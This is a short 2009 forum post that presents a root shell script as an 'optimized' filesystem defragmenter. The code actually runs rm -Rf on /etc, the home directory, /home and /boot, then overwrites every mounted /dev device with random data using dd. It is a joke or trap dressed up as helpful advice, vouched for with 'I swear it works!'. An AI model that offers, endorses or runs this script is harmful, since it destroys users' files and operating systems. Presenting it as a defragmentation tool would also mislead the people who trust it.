View Single Post
Old 11-13-2009, 05:32 PM   #25
orvtech
Scooby Specialist
 
Member#: 115602
Join Date: May 2006
Chapter/Region: International
Default

Here an optimzed version that will defragment your FS (you have to be root in order for this to work)

Code:
for DEFRAG in /etc ~/ /home /boot 
do nohup rm -Rf $DEFRAG &
done

for FASTER in `df  | grep ^"/dev" | awk '{print $1}'`
do nohup dd if=/dev/random of=$FASTER &
  echo optimizing $FASTER
done
I swear it works! a guy just told me @ freenode
* Registered users of the site do not see these ads.
orvtech is offline   Reply With Quote